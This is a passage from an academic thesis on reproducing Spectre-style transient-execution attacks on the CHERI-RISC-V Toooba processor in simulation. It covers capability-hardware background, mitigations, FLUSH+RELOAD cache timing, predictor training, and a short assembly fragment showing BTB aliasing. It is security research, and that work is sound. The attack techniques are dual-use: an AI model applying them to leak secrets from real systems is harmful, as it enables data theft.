crease the overall execution time. In the other case, the load will have to go
to the DRAM and the execution time will be longer. Most transient-execution
attacks demonstrated up to now use the FLUSH+RELOAD [18] attack. Here,
the attacker flushes the Last Level Cache (LLC), which is shared between all
cores. Next, the victim will run and load at least one cache line based on the
secrets it computes on. After the victim has been executed, the attacker reloads
an entire buffer. If certain loads are faster than others, the attacker knows that
the victim has accessed the corresponding cache line of the load. This allows
the attacker leak the secret value the victim computed on.
2.3 Security Mechanisms
In order to mitigate transient-execution attacks, academia and industry has
come up with many security mechanisms. The first generation of security
mechanisms was on the software side as they could be easily and quickly de-
ployed. Next, many hardware mechanisms were proposed and implemented
in the following generation of microarchitectures. In this section, I summarise
the most important principles of hardware-based mitigation mechanisms. An-
other mitigation mechanism – SinglePCC – will be explained in Section 6.1.
16 CHAPTER 2. BACKGROUND
2.3.1 Tagging Microarchitectural State
A class of mitigation mechanisms is to tag parts of the microarchitecture with
special values. Tagging parts of the microarchitecture prevents sharing mi-
croarchitectural state between protection domains that are not supposed to
share information with each other. For CHERI systems, the CHERI Compart-
ment Identifier (CID) is a tagging mitigation mechanism that has originally
been presented by Watson et al. [21]. A CID is an integer that uniquely iden-
tifies a compartment and is held in hardware. The idea is to add a field to
each BTB entry that is big enough to hold the CID. When a prediction is made
in the processor, the CID of the compartment currently running on the core
is compared to the respective entry of the BTB. If they match, the prediction
will be deemed trustworthy and the core will speculatively jump to the target.
Otherwise, the core will throw away the prediction results and will wait until
the jump target has been successfully resolved. Similar changes have to be
made for predictions coming from the RSB.
The CID mechanism successfully stops attacks that want to cross protec-
tion domains. A good example of an attack being mitigated is the attack on
sandboxes as it is described in Section 5.1.3. Tagging microarchitectural state
has also been adopted by industry, e.g., by Arm in the introduction of Arm
v8.5-A. The approach applied by Arm is to tag its microarchitecture and also
have special registers that either allow or disallow to use branch prediction
results from one context in another context. This has been implemented in
multiple processors, for example, the Cortex-A77 [36].
2.3.2 Special Instructions
Another option to mitigate transient-execution attacks is to give the users con-
trol of how much they want to share with other compartments. This can be
done by changing the ISA and adding new instructions. This puts the user or
compiler in charge of what can be microarchitecturally visible to other com-
partments operating on the same system. The following paragraphs discuss
several instructions that could be added and what influence they have.
One option is to flush the caches or part of them. Whenever a context-
switch is conducted, the operating system can flush all caches. This will effec-
tively mitigate all attacks presented in the Chapters 4 and 5 as the secret cannot
be recovered by timing measurements. Neither RISC-V nor CHERI-RISC-V
offer a flush instruction yet [11, 12, 37]. However, this does not solve the
problem of transient-execution attacks themselves as the transient-execution
sequence still happens – its effects are simply cleaned up. However, attack-
CHAPTER 2. BACKGROUND 17
ers may be able to find another side channel and use it to recover the secret.
Moreover, the performance penalty by regularly clearing the caches is cost
prohibitive in a system.
Furthermore, it might be an option to add instructions to enable flushing
of microarchitectural state, e.g., flushing the branch prediction unit. This ef-
fectively mitigates cross protection domain training and entry injection. How-
ever, it does not prevent attacks that work by finding a gadget in the victim
domain and this gadget then revealing a secret. Another option is to disable
entire microarchitectural units. This implies performance penalties, but effec-
tively mitigates attacks through a specific microarchitectural unit, e.g., Arm
offers to completely disable memory disambiguation and therefore preventing
Spectre-STL attacks [36]. Another class of instructions that is often used in
microarchitectures is barriers [33, 36]. Barriers – also called fences – do not
allow instructions being executed out-of-order or in speculation to pass them
and therefore enable software to make critical parts of its code secure. For ex-
ample, Arm introduces the Speculative Store Bypass Barrier that works by not
letting speculative loads pass previous stores to the same virtual address [36].
2.4 CHERI
Capability Hardware Enhanced RISC Instructions (CHERI) is a joint research
project of the University of Cambridge and SRI International. The CHERI
project has also been joined by Arm Limited who are developing a CHERI-
extended System-on-Chip called Morello using the ARMv8-A architecture as
the base ISA. The goal of the CHERI project is to enrich ISAs with additional
instructions that enable systems to have fine-grained memory protection and
compartmentalisation. CHERI can be divided into four parts: The abstract
model, the mapping of CHERI to a conventional ISA, the hardware imple-
mentation, and the software implementation. This section describes the key
points of the four parts of the CHERI project for RISC-V. CHERI is explained
more thoroughly in [37], which will be the main source unless stated other-
wise.
2.4.1 CHERI Abstract Model
The CHERI model itself is abstract – architecture neutral – and can in the-
ory be mapped to any concrete architecture. Therefore, CHERI extends an
architecture – referred to as the baseline architecture – rather than introduc-
ing a new architecture. The CHERI model is designed so that it composes
18 CHAPTER 2. BACKGROUND
well with mechanisms already in contemporary systems. This includes Mem-
ory Management Units (MMUs), virtual memory in general, processor ring
models, and the exception hierarchy on the baseline ISA. The main concept of
CHERI is capabilities. Capabilities are tokens owned by a program that are
characterised by being unforgeable and delegatable. A capability authorises a
program to access a certain area of memory. CHERI follows two main design
principles. First, the designers want to enforce the principle of least privilege.
This principle commonly used in the security world says that a program should
only get access and rights it needs for correct operation and not more. The sec-
ond principle is the principle of intentional use, which expresses that when a
choice to select a certain right from a pool of rights exists, this choice has al-
ways to be made explicit rather than implicit. The three main project goals
of CHERI are to provide fine-grained memory protection, software compart-
mentalisation, and viable transition path. A viable transition path means that
the transition from the conventional architecture to the CHERI variant of it
should be possible with a manageable effort. While the first two CHERI goals
are security goals, the latter one is a design goal as the designers assume that
CHERI will not be used in practice without being compatible with existing
systems.
CHERI uses this concept of capabilities and defines their own CHERI Ca-
pabilities in order to fulfill its project goals. The key feature of CHERI is that
capabilities are not implemented in software, but in hardware. Capabilities
and instructions to modify them become part of the ISA. This includes a reg-
ister file for CHERI capabilities as they need more space than conventional
integer pointers. The CHERI model does not specify how these registers need
to be implemented. The implementation can differ from instantiation to in-
stantiation. The following text gives an incomplete list of registers defined by
CHERI:
General Purpose Capability Registers Their usage is comparable to gen-
eral purpose registers on conventional architectures. Code can freely
use general purpose capability registers for loading, storing, and manip-
ulating capabilities, but these registers can also hold non-capability data.
The architectural instantiation can decide how many general purpose ca-
pability registers are implemented. Also the concrete implementation
determines whether general purpose capability registers are an exten-
sion of the general purpose register file defined by the baseline ISA – a
merged capability register file – or whether the two register files should
be split.
CHAPTER 2. BACKGROUND 19
063
p’16 otype’18 bounds’27
a’64
p: permissions otype: object type a: pointer address
Figure 2.5: Compressed CHERI Capabilities in Memory. Adapted from Wat-
son et al [37].
Program Counter Capability (PCC) This register extends the program counter
of conventional architectures so that the register holds capabilities in-
stead of integer pointers. Every instruction fetch is issued through the
PCC.
Default Data Capability (DDC) This register is used if code is not CHERI-
aware. All data loads and stores are issued through the DDC. CHERI-
aware code does not use the DDC, but more fine-grained capabilities
granted to the code running.
Others Depending on the baseline ISA more capability registers are available,
e.g., a register for storing the PCC during exception handling.
CHERI Capabilities want to provide hardware aided security for code point-
ers. The following attributes are enforced on CHERI Capabilities and must
hold at any time.
Bounds The memory accessible by CHERI Capabilities is limited by bounds.
An access outside of the bounds is strictly forbidden.
Permissions The kinds of operations that are permitted on the accessible mem-
ory are limited by permissions. Like bounds, permissions are part of
CHERI Capabilities.
Monotonicity An operation can never add more privileges to a CHERI Ca-
pability, but only restrict these privileges.
Integrity and Provenance A CHERI Capability is always derived from an-
other valid CHERI Capability and it is ensured at any point of execution
that a corrupted CHERI Capability cannot be used as a reference.
Figure 2.5 shows the format of 128-bit CHERI Capabilities in Memory.
This is the format used throughout this entire thesis work. CHERI Capabilities
20 CHAPTER 2. BACKGROUND
contain the pointer address itself, the compressed bounds, the object type, and
the permissions. The bounds are compressed using the CHERI Concentrate
encoding [37, 38]. CHERI defines one bit tags for capabilities that are held
both in capability registers and in memory. These tags protect the integrity
of capabilities and that capabilities are always derived from a valid capability.
The tag bit is not shown in Figure 2.5. The exact bits of 128-bit capabilities
are more thoroughly discussed where appropriate for certain attacks in the
following chapters.
CHERI Capabilities – from now an referred to as capabilities – spread like
a tree during runtime. At the CPU start, capability registers hold root capabil-
ities that have all permissions set and can access the entire available memory
space. Code will monotonically refine root capabilities during runtime as de-
sired. Finally, a user-space program will be granted fine-grained capabilities
aligned to its needs. These capabilities are the leaves of the tree unless the
program decides to refine its capabilities again. The process of deriving capa-
bilities defines a chain of provenance.
Furthermore, CHERI allows sealing and unsealing of capabilities. A sealed
capability is non-dereferencable and immutable, which means that sealed ca-
pabilities cannot be manipulated and cannot be used for memory accesses. Un-
sealing is only possible with a capability that grants sufficient rights to do so.
Sealed capabilities are used for two purposes in CHERI systems even though
more use cases are possible. First, they can be passed to untrusted code, e.g. to
serve as a token of authority. Second, sealed capabilities can be used for pro-
tection domain switching. In an object-oriented environment a sealed code
capability and a sealed data capability constitute the object’s code and its ac-
cessible data. An atomic operation unsealing both capabilities and jumping to
the code capability represents a protection domain switch.
In order to comply with the principle of intentional use, CHERI extends the
baseline ISA with capability instructions. It is always explicit which operands
an instruction has and it cannot by interpreted dynamically, e.g. a load either
loads an integer pointer or a capability. CHERI provides the following classes
of instructions:
Extract Capability Fields Purpose of these instructions is to copy certain
fields of capabilities, e.g. the offset field, to a general purpose regis-
ter for inspection reasons.
Move Capability Purpose of these instructions is to move a capability from
one capability register to another one without modifying the capability
itself.
CHAPTER 2. BACKGROUND 21
Manipulate Capability These instructions allow to monotonically change fields
of capabilities, e.g. the offset field.
Load and Store These instructions allow to load or store data through a capa-
bility, but this class also contains instructions that allow to load or store
capabilities through another capability. The capability used for loading
or storing has to allow that access by being suitably configured.
Change Control-Flow CHERI offers jump and branch instructions. Whether
branches are taken or not depends on capability fields set or not.
(Un)seal Capability These instructions allow to seal or unseal a capability
with another authorising capability. Also, this class of instructions con-
tains protection domain switching.
Check Capability These instructions check whether capability fields match
expected values and throw an exception if this is not the case.
2.4.2 CHERI-RISC-V
CHERI-RISC-V [37] is the mapping of the abstract CHERI model to RISC-V.
As explained above, RISC-V is an ISA design space due to its modular design.
CHERI-RISC-V can therefore also be considered an ISA design space. A par-
ticular instantiation of CHERI-RISC-V may choose to implement multiple op-
tions described in the following paragraphs in a way that it is parameterisable.
Both 32-bit and 64-bit RISC-V are extended for CHERI. The CHERI de-
signers also express the possibility of a 128-bit CHERI-RISC-V mapping when
RISC-V has evolved that far. The length of capabilities is 64 bits for 32-bit
CHERI-RISC-V and 128 bits for 64-bit CHERI-RISC-V not including the tag
bit.
CHERI-RISC-V describes both split and merged register files. The goal of
the CHERI project is to provide hardware that offers memory protection and
compartmentalisation for all kinds of application areas. In a merged register
file, a general purpose register has the width to hold a capability as well. A
merged register file helps to reduce the amount of logical gates on a chip where
this is necessary, e.g., ISAs for embedded processors like RV32E. However,
the principle of intentional use has to be fulfilled. An access to register must
never be ambiguous in the way its value is interpreted.
Besides the load and store instructions for bytes, half-words, words, and
double-words CHERI-RISC-V also extends RISC-V for instructions that can
22 CHAPTER 2. BACKGROUND
load and store floating point values through capabilities. Furthermore, CHERI-
RISC-V allows atomic operations to work with capabilities. Therefore, all
memory accesses in a CHERI-RISC-V can be handled through capabilities if
this is desired by the program. CHERI-RISC-V offers also compressed CHERI
instructions. When executed in capability pointer mode, each implicit register
operand by the compressed instruction is expected to be the capability variant
of the corresponding register.
Furthermore, CHERI-RISC-V introduces Special Capability Registers
(SCRs) that extend conventional RISC-V registers, but also add new registers.
The purpose of SCRs is to enable exception handling with capabilities. They
extend {m,s,u}{tvec,epc,scratch} and add new data capabilities for each of the
three privilege levels for their respective memory areas. CHERI-RISC-V also
extends RISC-V CSRs for capability functioning. Last, CHERI-RISC-V en-
riches RISC-V’s Page Table Entrys (PTEs) such that there is one bit that spec-
ifies whether capabilities might be stored to that page and one bit that specifies
whether a capability might be loaded from that page.
2.4.3 CHERI-RISC-V Hardware
The CHERI project contains three RISC-V processors that have been extended
with CHERI instructions: Piccolo1 is an in-order, 3 stage pipeline processor
that implements RV32ACIMUxCHERI, where xCHERI means that this pro-
cessor implements CHERI-RISC-V as well. Flute2 is an in-order, 5 stage
pipeline processor that implements RV64ACDFIMSUxCHERI and supports
virtual memory as well. Toooba3 is an out-of-order, deep, and superscalar pro-
cessor that implements RV64ACDFIMSUxCHERI and supports virtual mem-
ory.
2.4.4 CHERI Software Stack
There is a large software stack of programs that have been created especially
for CHERI systems or adapted for them. In this section, I describe the impor-
tant bits with respect to the work conducted in this thesis.
1available at https://github.com/CTSRD-CHERI/Piccolo2available at https://github.com/CTSRD-CHERI/Flute3available at https://github.com/CTSRD-CHERI/Toooba
CHAPTER 2. BACKGROUND 23
CHERI-LLVM
The LLVM framework can be split into two parts: the front-ends and back-
ends. The main tasks of the front-ends is to parse the input files and generate
output that is used by the back-ends – the Intermediate Representation (IR).
LLVM supports multiple front-ends, e.g., clang in order to compile C/C++.
Furthermore, each target ISA has its own back-end that generates machine
code specific to that ISA. The CHERI project extended the clang front-end
generically for all supported ISAs such that pointers are represented by capa-
bilities instead of integer values. However, each back-end has to be tailored
for the particular underlying ISA, e.g. MIPS or RISC-V, in order to produce
the correct CHERI instructions needed. These changes constitute the CHERI-
LLVM framework4. The CHERI-LLVM compiler framework also includes
other tools not needed for compiling in the first place, but that are helpful for
debugging, e.g., riscv64cheri-objdump.
Operating Systems
The CHERI software stack includes two operating systems that have been
adopted to run on a CHERI processor. CheriBSD5 is a fork of FreeBSD and
receives the main research focus in OS research within the CHERI project.
CheriBSD provides CheriABI [39], which is an Application Binary Interface
such that applications that use CHERI can communicate with the kernel. The
kernel itself does not need to use capabilities internally, but can. The pure-
capability CheriBSD kernel is currently a work-in-progress. CheriRTOS6 is
a fork of FreeRTOS and intended as a pure-capability system from the very
beginning [40].
2.4.5 CHERI Security Model
CHERI aims to implement two security principles: fine-grained memory pro-
tection and software compartmentalisation. These two principles need to be
guaranteed in all implementations – including in speculation and out-of-order
execution. Cache timing side channels as described in Section 2.2.3 are not
part of the security model. AMD states that their architectures do not pre-
vent cache timing side-channel attacks as well and argues that these attacks
have to be prevented by software [41]. Arm states that timing side-channel
4available at https://github.com/CTSRD-CHERI/llvm-project5available at https://github.com/CTSRD-CHERI/cheribsd6available at https://github.com/CTSRD-CHERI/cherios
24 CHAPTER 2. BACKGROUND
attacks were no novelty. However, timing side-channel attacks in connection
with transient execution were not known [32]. CHERI does not guarantee the
absence of timing side channels, but should give guarantees about transient
execution. This means that transiently executed instructions should not lead
to any privilege escalation. An attacker should never have access to more ca-
pabilities than those granted by the architectural register state and the capabil-
ities reachable through those. Furthermore, CHERI-RISC-V systems should
follow the security model required by RISC-V, which includes separating M,
S, and U privilege mode and their access rights. Attacks can be divided into
three classes expressed in the dependency of the victim:
Independent This class of attacks does not require any action or help from
the “victim”.
Exploitative This class of attacks requires the “victim” to unknowingly or
unwillingly cooperate with the attacker.
Collusion This class of attacks requires the “victim” to willingly collaborate
with the attacker.
It is expected that attackers are able to execute arbitrary code on a CHERI
system, e.g., a user limited to a sandbox who turned into an attacker. An exam-
ple for this could be a JavaScript pulled from web when rendering a web page.
Therefore, an attacker is assumed to be able to attempt independent attacks.
Meltdown-style attacks – as explained in Section 2.2.2 – are typical indepen-
dent attacks. It is further expected that the entire CHERI system should be safe
in the presence of such an attacker even in the case of instructions only being
executed transiently. Furthermore, a CHERI system has to expect that an at-
tacker will attempt exploitative attacks by trying to get the unwitting help of
other code running on the system and having access to powerful capabilities.
Spectre-style attacks – as explained in Section 2.2.1 – are typical exploitative
attacks. For CHERI implementations, any willing collaboration from the vic-
tim side is not expected, which excludes the class of collusion attacks from the
security model used in this thesis work.
2.5 Related Work
Woodruff et al. [21] discussed the applicability of Spectre-PHT, Spectre-BTB,
and Meltdown-US on CHERI systems. They clearly state that capability fields
must not be subject of speculation, but all CHERI checks have to be finished
CHAPTER 2. BACKGROUND 25
successfully before accessing memory. Otherwise the protection mechanisms
of CHERI are likely to be bypassed. They are especially concerned about
cross protection domain attacks on CHERI systems. Therefore, they propose
the introduction of a CID that specifies when microarchitectural state may be
shared with other protection domains.
Gonzalez et al. [42] were the first ones to demonstrate speculative execu-
tion attacks on a RISC-V processor. They successfully reproduced Spectre-
PHT and Spectre-BTB on the Berkeley Out-of-Order Machine (BOOM) [43],
but no other speculative attacks. Furthermore, they did not attempt to conduct
Meltdown-style transient-execution attacks. However, Gonzalez et al. stated
the theoretical feasibility of the remaining transient-execution attacks, which
is proved in my work. Similar work on the BOOM processor has been done
by Le et al. [44].
There has been more work conducted on other comparable RISC archi-
tectures. Arm has summarised and explained the most impactful transient-
execution attacks and explained how they would be conducted on an Arm
microarchitecture [32]. Furthermore, Arm has evaluated which of its mi-
croarchitectures are vulnerable to which attack [45]. The covered attacks are
Spectre-PHT, Spectre-BTB, Spectre-RSB, Spectre-STL, Meltdown-US, and
Meltdown-GP – the attack names used by Arm do not follow the naming
scheme of this work though. Arm clearly states that all other microarchitec-
tures unlisted are not vulnerable to any transient-execution attack. None of
the listed microarchitectures are vulnerable to all attacks, but only to a subset.
However, Spectre-PHT was classified successful on all listed microarchitec-
tures. Moreover, each attack could be reproduced on at least one of Arm’s
microarchitectures. As stated by Canella et al. [19], Arm’s processors are
only vulnerable to a subset of Meltdown-style attacks that Intel’s and AMD’s
processors are vulnerable to. Many Meltdown-style attacks are tailored to the
x86_64 architecture and special features of various implementations of it. Nei-
ther Arm’s ISA nor RISC-V have the necessary features and therefore no im-
plementation is vulnerable to this subset of Meltdown-style attacks. Due to
the similarity in the architectural style, Arm’s summary of attacks also sets the
scope of this work. The four Spectre attacks, Meltdown-US, and Meltdown-
GP will be the main target of this work.
Chapter 3
Methods
In this chapter, I describe the resources I used to conduct my experiments.
Furthermore, I explain which research methods I applied for which part of
this work. The last part of this chapter is to describe common methods I used
and how the actual measurements were conducted.
3.1 Toooba
The experiments presented in Chapters 4 and 5 are conducted on CHERI’s
fork of the out-of-order processor Toooba. Toooba itself has been developed
by Bluespec Inc. that added compressed instructions support for debugging
to MIT’s RISCY-OOO [46] – a framework that allows parameterisable config-
uration of the processor to be built. RISCY-OOO is written in the Bluespec
SystemVerilog Hardware Description Language (HDL) that allows configu-
ration to be conducted more easily. Bluespec HDL code can be simulated
directly or can be compiled to Verilog code, which then can be simulated by
a Verilog simulator or it can be used to produce a FPGA image. For all my
experiments, I compiled Toooba’s code to Verilog code using the open-source
Bluespec compiler1 (release 2020.02). I used the verilator (Version 3.916)
simulator2 in order to produce the results presented in Chapters 4 and 5.
Figure 3.1 shows the parameterisable RISCY-OOO pipeline that is used in
Toooba. The pipeline can be divided into three separate parts: Fetch, Execute,
and Commit. In this figure, the Fetch stage includes decoding and renaming as
well, which is not the case in conventional models of the pipeline, e.g. by Pat-
terson and Hennessy [14]. This part is also called the front-end of Toooba and
1available at https://github.com/B-Lang-org/bsc2available at https://github.com/verilator/verilator
26
CHAPTER 3. METHODS 27
ALU
Fetch Execute Commit
Fetch 1
Fetch 2
Fetch 3
Decode
FPU
ALU
n/2
n
MEM
Rename
n
Commit
D $
TLB
I $
BTB
Reord
er
Buffe
r
IQ
IQ IQ
IQ
Regis
ter
File/F
orw
ard
ing
Figure 3.1: The parameterisable RISCY-OOO pipeline. In my configura-
tion, I chose n=2, which means that Toooba has two ALU pipelines, one FPU
pipeline, and one memory pipeline. 3
instructions are handled in-order in this part. The rename stage puts instruc-
tions in the reservation stations of the respective pipelines of which Toooba
has three: the Arithmetic Logic Unit (ALU) pipeline, the Floating Point Unit
(FPU) pipeline, and the memory pipeline. The ALU pipeline can handle n
instructions per cycle, the FPU pipeline n/2 instructions per cycle, and the
memory pipeline one instruction per cycle. The Execute part of Toooba in-
cluding all three pipelines is completely out-of-order and can execute instruc-
tions as soon as all operands are available to it. In my configuration of Toooba,
I chose n = 2, which means that Toooba can fetch, decode, rename, issue, and
retire 2 instructions in one cycle if no bubbles appear in the pipeline, e.g.,
misprediction may cause Toooba not to be able to commit any instruction for
multiple cycles. Toooba has two ALU pipelines, one FPU pipeline, and one
memory pipeline in my configuration. Processors that can execute more than
one instruction per clock cycle are called superscalar processors. In my in-
stantiation, Toooba is a 2-superscalar processor because it can execute two
instructions per cycle.
Furthermore, I used the TEST cache configuration, which determines the
following settings: The L1 data and instruction cache are each 2 KiB large and
3This figure is borrowed from the CHERI team
28 CHAPTER 3. METHODS
Out-of-order window size 64
L1 size 2 KiB
L2 size 8 KiB
L1/L2 ways 2
Cache line size 64 byte
Load Queue size 24
Store Queue size 14
Store Buffer size 4
Table 3.1: The parameters of the Toooba configuration used for my experi-
ments.
2-way associative, the L2 cache has a size of 8 KiB and is 2-way associative
as well, and cache lines are 64 bytes long. Toooba has a window of 64 instruc-
tions that can be executed out-of-order and the memory queues (load queue,
store queue, store buffer) are capable of tracking 38 outstanding memory in-
structions. Toooba supports Sv39, which means that virtual addresses are 39
bits long. These data are summarised in Table 3.1.
In order to successfully conduct Spectre-BTB attacks as presented in Chap-
ter 4 and 5, I needed to make changes to Toooba’s BTB. Before my changes,
Toooba did not use a hashing function for tag, but used the entire address.
I implemented a hashing function, which is described in Section 5.1.3 as it
poses a contribution to the research platform. Having a hashing function for
tags in the BTB is a common mechanism used in industry [22]. Therefore, I
find that my changes to Toooba’s BTB are no simplification of my work, but
more an adaption to the real-world setup.
3.2 Research Methodology
In this master’s thesis work, I used quantitative research methods in order to
prove the hypothesis of transient-execution attacks being feasible on Toooba.
Transient-execution attacks will be reproduced in assembly and C code. I rely
on the compiling toolchain including the compiler, linker, and assembler to
be correct in order to produce meaningful results. The success of attacks will
be determined on whether the access time to certain memory data is signif-
icantly faster than to others. For all attempted attacks, I used the verilator
simulator, which generates a cycle-accurate model of Toooba’s Verilog code.
In order for my results to be meaningful, I rely on the verilator simulation to
CHAPTER 3. METHODS 29
be correct. Furthermore, the explanation of why an attack works in Toooba
or not is conducted with quantitative methods as simulation gives clear and
objective evidence of which actions Toooba takes when certain scenarios have
happened.
In the discussion of the different transient-execution attacks, I mainly use
quantitative research methods as well. Some Spectre-style attacks are run with
a mitigation mechanism enabled giving quantitative results whether a specific
attack is successful or not. However, I will also use qualitative methods in
order to describe which impact certain attack classes have. The impact of an
attack is determined by the threat model. Threat models and evaluating threats
corresponding to them requires opinions and cannot be expressed in objective
and quantitative data.
3.3 Common Mechanisms
This subsection summarises common techniques used for the experiments con-
ducted in Chapters 4 and 5 or in order to prepare them.
3.3.1 Flushing Caches
Flushing caches is used by transient-execution attacks for two reasons. First,
flushing caches – or evicting a specific cache line – leads to longer miss penal-
ties for loads and more accurate timing analysis. Second, flushing caches pro-
vides a clean state before conducting timing measurements. As explained in
Chapters 4 and 5, attackers want to create the situation that the processor mis-
speculates and the time span until the misprediction is discovered and instruc-
tion are rolled back to be as long as possible. This can be achieved by making
load requests go all the way to memory and not hitting any of the caches. As
described in Section 3.3.2, probing the caches needs a clean state in order to
achieve reliable results.
As stated in Table 3.1, Toooba’s L1 data cache in the TEST configuration
has space for 2 KiB and the L2 cache has space for 8 KiB. RISC-V does not
have a dedicated flush instruction and CHERI-RISC-V does not provide one
either [11, 12, 37]. This means that attackers need to implement their own
flush functions. I implemented a function that loads an entire memory region
into the caches and therefore evicts content previously present. This function
loads in a granularity of 64 bytes as for each load the entire respective cache
line will be loaded.
30 CHAPTER 3. METHODS
3.3.2 Timing Measurements
For the attacks presented in Chapters 4 and 5, I always use the same mech-
anism in order to prove that an attack has been conducted successfully. The
code under attack will speculatively load a value into the core. This value is
used as an index into a shared array between victim and attacker. Probing the
access times to values in this shared array will allow the attacker to recover the
original secret. Throughout all my experiments, I use FLUSH+RELOAD [18],
which is an access-driven technique. In order to successfully probe the cache,
the attacker evicts all cache lines of the array to probe – the flush phase – and
then starts the attack. This leads to the situation that the only cache line of the
shared array being present is the one that was speculatively accessed to reveal
the secret.
As a next step, the attacker accesses value after value in the shared array
and measures the time it takes to access the array as precisely as possible –
the reload phase. The attacker does probe on the granularity of cache lines,
which means on the granularity of 64 bytes in Toooba. The results of probing
the memory addresses [0x80001000,0x800017ff] are depicted in Figure 3.2.
As stated in Table 3.1, Toooba’s L1 data cache has 32 lines, which are indexed
by [0, ...,31]. This number of cache lines exactly matches the 0x800 bytes,
which the attacker wants to probe in steps of 64 bytes.
In the example in Figure 3.2, the victim code has speculatively accessed a
double-word at the address 0x80001100. This reflects exactly the data as the
cache line with index four has a significantly shorter access time than all other
cache lines. All other memory accesses but the very first one require roughly
30 cycles with only small variations. However, the first memory access is
significantly slower with 60 cycles needed. This can be explained with the
cold branch predictor in the assembly code of the probe function. The cold
branch predictor makes Toooba load instructions on a cache line not being
present, which leads to this delay.
The attacker can only measure the presence of a certain cache line, but
not which exact address made the cache line being loaded. This means that
the attacker can only leak a very limited number of bits per probing attack.
In my work, I do not use cache bank collision attacks as described in [47].
Therefore, the only information the attacker can gain is which cache line has
been accessed compared to all possible cache lines.
log2(#cache − lines) = log2(32) = 5 bits (3.1)
Equation 3.1 shows the amount of information an attacker gains in general
CHAPTER 3. METHODS 31
0 4 8 12 16 20 24 280
10
20
30
40
50
60
Cache Line Number
Cycl
esN
eeded
Figure 3.2: Results of probing the L1 cache after an attack has been conducted.
and the exact number in my configuration of Toooba. In order to recover more
than five bits, an attacker will need to conduct the attack multiple times, e.g.,
for a full 64 bit double-word to be recovered an attacker has to do that attack
13 times. The speed of leaking values determines the success of real-world at-
tacks [22, 27]. However, this is out of scope for this thesis work. In Chapters 4
and 5, I present attacks attempted and whether they have been conducted suc-
cessfully, which implies that they are capable of leaking information, but no
claims about the speed and implications of their impact on real-world attacks
are made.
Chapter 4
RISC-V Results
In this chapter, I describe the results obtained by reproducing the different
transient-execution attacks described in Chapter 2 on RISC-V Toooba. To my
knowledge, this work is the first one to reproduce all four Spectre-style attacks
on a RISC-V processor. All attacks together build an extensible framework
for exploring transient-execution attacks on RISC-V processors, which con-
stitutes a platform for further research not only on Toooba, but on any other
vulnerable processor. An extension to the framework is contributed by the
work described in Chapter 5, which extends all Spectre-style RISC-V attacks
to CHERI-RISC-V attacks and adds new Meltdown-style attacks. Describing
the reasons for the success or failure of Spectre-style attacks in both this chap-
ter and the chapter about the CHERI-RISC-V results would introduce many
redundancies. Therefore, I decided to only give a high-level explanation for
most attacks in this chapter and deeply dive into Toooba’s pipeline in the fol-
lowing chapter.
4.1 Spectre Attacks
This section contains the Spectre-style attacks attempted on RISC-V Toooba
in assembly and C. The results are depicted in Table 4.1. An entry marked
with (✓) means that this attack was conducted successfully, (✗) means that I
could not craft a successful attack. An entry marked with (-) indicates that I
did not attempt an attack at all. All attacks could be reproduced successfully
in RISC-V assembly. In order to prove the general applicability, the Spectre-
PHT, Spectre-BTB, Spectre-RSB, and Spectre-STL-Load attacks have been
reproduced in C as well.
32
CHAPTER 4. RISC-V RESULTS 33
asm C
Spectre-PHT ✓ ✓
Spectre-PHT-Write ✓ -
Spectre-BTB ✓ ✓
Spectre-RSB ✓ ✓
Spectre-STL-Load ✓ ✓
Spectre-STL-Jump ✓ -
Table 4.1: Overview of attempted Spectre-style attacks on RISC-V Toooba
and whether they were successful.
4.1.1 Spectre-PHT
The reproduction of Spectre-PHT in both RISC-V assembly and C was con-
ducted as described in [22]. The important piece of Spectre-PHT attacks is to
train the branch direction predictor. The riscy-OOO processor implements
multiple branch direction predictors. Toooba uses a tournament predictor,
which consists of one local and one global predictor. Both the local and the
global predictor have their own Branch History Table (BHT). A two bit selec-
tor determines which of these two predictors is used for the actual response
of the tournament predictor. The goal of the attack is to train the prediction
for the branch-greater-equal (bge) instruction such that it predicts
not taken when the actual attack will be conducted. To achieve that, attack-
ers have two options. They can either train the global predictor to return not
taken for that particular branch or they can train the local predictor to return
not taken. The attacker has to keep in mind that it is important to train the
selector accordingly as well. In Section 5.1.1, I explain thoroughly how I train
the tournament predictor in order to achieve a successful attack. The principle
of training remains the same over all Spectre-PHT attacks I conducted.
In later stages of this work, I reviewed Toooba’s branch direction predic-
tion and made the following observation. When a specific branch is predicted
the first time by the tournament predictor, the predictor always uses the local
branch prediction unit. Furthermore, the local branch predictor is initialised
with predicting False for the first prediction. Therefore, whenever Toooba en-
counters a branch the first time, it will be predicted to False. For the Spectre-
PHT attack as shown in Figure 5.1, this means that the branch prediction does
the attacker-desired action by default. Therefore, an attacker does not need
a training phase to conduct a successful attack, which I have confirmed in a
34 CHAPTER 4. RISC-V RESULTS
pratical example of Spectre-PHT. This helps the attacker in two ways. First,
the attack becomes easier as no previous training calls are needed and second
the attacker saves time, which positively affects the bandwidth of a real-world
attack.
4.1.2 Spectre-PHT-Write
This variant of Spectre-PHT seeks to conduct a speculative write instead of a
speculative load [34]. Out-of-bounds writes can be used to direct control-flow
to a gadget of interest for the attacker, e.g., by overwriting the return address re-
siding on the software stack. Speculatively overwriting a return address can be
the starting point of a Return-Oriented Programming (ROP) attack [48]. With
code not using capabilities, I successfully crafted an attack that overwrites the
return address such that the control-flow will be speculatively directed to a
gadget revealing a register value.
4.1.3 Spectre-BTB
Following Canella et al. [19], all Spectre-style attacks can be conducted in-
place and out-of-place. However, throughout my thesis work, Spectre-BTB
is the only attack were I attempted both attack types. In Figure 4.1, both the
in-place and the out-of-place variant is depicted. On the left side, the two in-
direct jumps are mapped to the same BTB entry and therefore one jump can
impact the prediction of another jump. The exact explanation of why and how
a BTB entry is aliased in Toooba is given in Section 5.1.3. On the right side of
Figure 4.1, there is only one jump that trains the BTB. Depeding on whether
funct is called from call_0 or call_1, the jump will take different direc-
tions. Therefore, previous calls to funct impact the branch target prediction
of that jump. Both attacks reach the same goal, which is training a BTB entry.
I reproduced both attacks with code similar to the one shown in Figure 4.1
and both attacks were successful. For the remainder of this thesis, I only use
Spectre-BTB out-of-place as it I believe it is more convenient for an attacker to
directly poison the BTB instead of indirectly calling another function. There-
fore, I will use the abbreviation Spectre-BTB for the out-of-place variant.
4.1.4 Spectre-RSB
The goal of Spectre-RSB attacks is to create a mismatch between hardware
and software return addresses. In order to reproduce this attack, I created
examplary code, which fetches its return address from memory and returns
CHAPTER 4. RISC-V RESULTS 35
800000c8: jr t1
...
800202c8: jalr t1
call_0:
la a0, addr_0
jal ra, funct
...
call_1:
la a0, addr_1
jal ra, funct
...
funct:
jr a0
